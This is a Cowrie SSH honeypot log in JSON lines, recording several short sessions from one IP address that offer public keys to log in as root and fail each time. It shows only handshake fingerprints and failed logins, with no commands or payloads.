{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.090771Z","src_ip":"212.227.125.160","session":"3285228211df"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.185717Z","src_ip":"212.227.125.160","session":"3285228211df"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.186285Z","src_ip":"212.227.125.160","session":"3285228211df"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"31:37:b7:f7:a7:6a:40:55:79:fe:90:69:de:35:05:67","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGnSXQwfse2xGZ6wGn3ng++QmelqwRocuAXe82dFpc/3","type":"ssh-ed25519","message":"public key attempt for user root of type ssh-ed25519 with fingerprint 31:37:b7:f7:a7:6a:40:55:79:fe:90:69:de:35:05:67","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.231649Z","src_ip":"212.227.125.160","session":"3285228211df"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"31:37:b7:f7:a7:6a:40:55:79:fe:90:69:de:35:05:67","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGnSXQwfse2xGZ6wGn3ng++QmelqwRocuAXe82dFpc/3","type":"ssh-ed25519","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.232241Z","src_ip":"212.227.125.160","session":"3285228211df"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.276045Z","src_ip":"212.227.125.160","session":"3285228211df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42872,"dst_ip":"1.2.3.4","dst_port":22,"session":"375c3b6375ca","protocol":"ssh","message":"New connection: 212.227.125.160:42872 (1.2.3.4:22) [session: 375c3b6375ca]","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.317424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.318306Z","src_ip":"212.227.125.160","session":"375c3b6375ca"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.360029Z","src_ip":"212.227.125.160","session":"375c3b6375ca"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.447080Z","src_ip":"212.227.125.160","session":"375c3b6375ca"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.447719Z","src_ip":"212.227.125.160","session":"375c3b6375ca"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"3a:2d:90:7f:db:51:ac:5b:99:5c:30:41:9b:50:60:e6","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Nt1BKYKiIrQtwJr1aNgczUzEykIW1/GPIslxUqW6nhRXhqS4+er4PXDg8m8jvsNhbocnhA5J52B1yzB5DJE0xeog/AWhw82CmHaTdP0UWaxxsGmw22lxqWpT+KuLQ210s8jhXVE6KyXAm+aYPGSZIefPW7FphSTsEi/+wv5lzGfdi5VvcZboChKkpxEzpZ2uBl5vaMKKdZUMjy0rr03pb1bmD9JBBcMvEK6yN3wLbfsiDUOWLULbkKHi2C3L39D/z2y1ZOpGlFMinAANUCBt8RCDr0BCrR9AwIsbJS8IRft7/8Y3dK4q8ZU799wv4GUt7Amz2dIiC1nvp0nzp8s5","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 3a:2d:90:7f:db:51:ac:5b:99:5c:30:41:9b:50:60:e6","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.490460Z","src_ip":"212.227.125.160","session":"375c3b6375ca"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"3a:2d:90:7f:db:51:ac:5b:99:5c:30:41:9b:50:60:e6","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Nt1BKYKiIrQtwJr1aNgczUzEykIW1/GPIslxUqW6nhRXhqS4+er4PXDg8m8jvsNhbocnhA5J52B1yzB5DJE0xeog/AWhw82CmHaTdP0UWaxxsGmw22lxqWpT+KuLQ210s8jhXVE6KyXAm+aYPGSZIefPW7FphSTsEi/+wv5lzGfdi5VvcZboChKkpxEzpZ2uBl5vaMKKdZUMjy0rr03pb1bmD9JBBcMvEK6yN3wLbfsiDUOWLULbkKHi2C3L39D/z2y1ZOpGlFMinAANUCBt8RCDr0BCrR9AwIsbJS8IRft7/8Y3dK4q8ZU799wv4GUt7Amz2dIiC1nvp0nzp8s5","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.491055Z","src_ip":"212.227.125.160","session":"375c3b6375ca"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.533597Z","src_ip":"212.227.125.160","session":"375c3b6375ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42884,"dst_ip":"1.2.3.4","dst_port":22,"session":"69eec4d7da9c","protocol":"ssh","message":"New connection: 212.227.125.160:42884 (1.2.3.4:22) [session: 69eec4d7da9c]","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.574805Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.575393Z","src_ip":"212.227.125.160","session":"69eec4d7da9c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.617073Z","src_ip":"212.227.125.160","session":"69eec4d7da9c"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.702600Z","src_ip":"212.227.125.160","session":"69eec4d7da9c"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.703298Z","src_ip":"212.227.125.160","session":"69eec4d7da9c"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTpdG+f24ZLGM1XY2PTbBvm+Xqqf9ryjietrZ8ZznOo3IoqOzjPmdNJugKYS4Qaom1HCOTQdLzxTYKwlNUSe6lvcyirfQzgzBUsh4dCQ42oILJMsEFp2gwiqx/MnT5w+gITwsHFovX/Sm6RzxNRokQST9vduiHEZ3ytfiFolrPIu9ZLkWm/2fgvaAhu8Z6hAhpObjitg44rkG2QI2gdIiMSF2bMmErzZHD471e2Yl8ryEpzHX731db7CSL/3v5qUR1FRAXcovO4lVL0EMfE0NE6MV4TVoAQaWtAo4WuIEVzAPXHA/KezhX92V8WhG7Zt1Nto2rQvTY04lJuUDZNr5t","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.746288Z","src_ip":"212.227.125.160","session":"69eec4d7da9c"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"23:c8:64:09:84:20:35:9f:76:8a:09:2d:8b:cf:48:33","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTpdG+f24ZLGM1XY2PTbBvm+Xqqf9ryjietrZ8ZznOo3IoqOzjPmdNJugKYS4Qaom1HCOTQdLzxTYKwlNUSe6lvcyirfQzgzBUsh4dCQ42oILJMsEFp2gwiqx/MnT5w+gITwsHFovX/Sm6RzxNRokQST9vduiHEZ3ytfiFolrPIu9ZLkWm/2fgvaAhu8Z6hAhpObjitg44rkG2QI2gdIiMSF2bMmErzZHD471e2Yl8ryEpzHX731db7CSL/3v5qUR1FRAXcovO4lVL0EMfE0NE6MV4TVoAQaWtAo4WuIEVzAPXHA/KezhX92V8WhG7Zt1Nto2rQvTY04lJuUDZNr5t","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.746915Z","src_ip":"212.227.125.160","session":"69eec4d7da9c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.789592Z","src_ip":"212.227.125.160","session":"69eec4d7da9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42892,"dst_ip":"1.2.3.4","dst_port":22,"session":"755812868a10","protocol":"ssh","message":"New connection: 212.227.125.160:42892 (1.2.3.4:22) [session: 755812868a10]","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.829944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.830965Z","src_ip":"212.227.125.160","session":"755812868a10"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.873402Z","src_ip":"212.227.125.160","session":"755812868a10"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.959474Z","src_ip":"212.227.125.160","session":"755812868a10"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.960089Z","src_ip":"212.227.125.160","session":"755812868a10"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDevQyCt06VKbdFcD680JVyiFncqdLKD9/oepOO8uwrSl2+feESHRtXEVFKzm8ew5722I8ap8uxjf3DmVvdvVgv1FSToxY3QREPRcxvSyve3Vj74E8cTeYVhfVeYxUf3e0XXofo/c5xvkpK34OxO5bqteZLTBc5bZaIL1mwgmU/tl5yK5Ut6BfupCicYLxGZOMy/qpNIaJn/64gLW3sHI4ZLwqa6RU7rD56lUroxQAJ7Ysf2aAUSFxtG35+qvt3N/NwXiq8RNPURuRj+M6PYnng0dHyD629ytH5kxCM2DKRxLDPEnMociRRN2Hhs/8MN37U9N3hgmf5fUb7osvUdBcus+r6Vxn22eQo5Bgp+8APDDDoDauTNOIU/AOkphJkMEfJYgeunAnfZbnMwOqVJF5yvkzjqF6v05jWL4hAvY+dpjsrtihOT+UV/MyFE6KcN87ZQNJPCBCiWxKZqycO0tTmqn1pGmza7UEi+VBmt9SNq+z8ULHa9L+wL9SKtdIO5TTPeNXAyyb9mDQNoNiS2rJPNqLV6BIbepwlmqq8ME9IC3TVQVOo4TwQv2Ioujra1VIxf18wUBhNG1zDjEd5q59TVJ/rP7H6bIjbDZ/YgGKPYZGAOdHhDGUmfLToxbWbCwbPKwJYJzZfUiNEVsxIBW1BvhjgvLM4g/okjkMTzEZ9Zw==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","sensor":"my-vps","timestamp":"2025-08-28T01:57:40.002353Z","src_ip":"212.227.125.160","session":"755812868a10"}
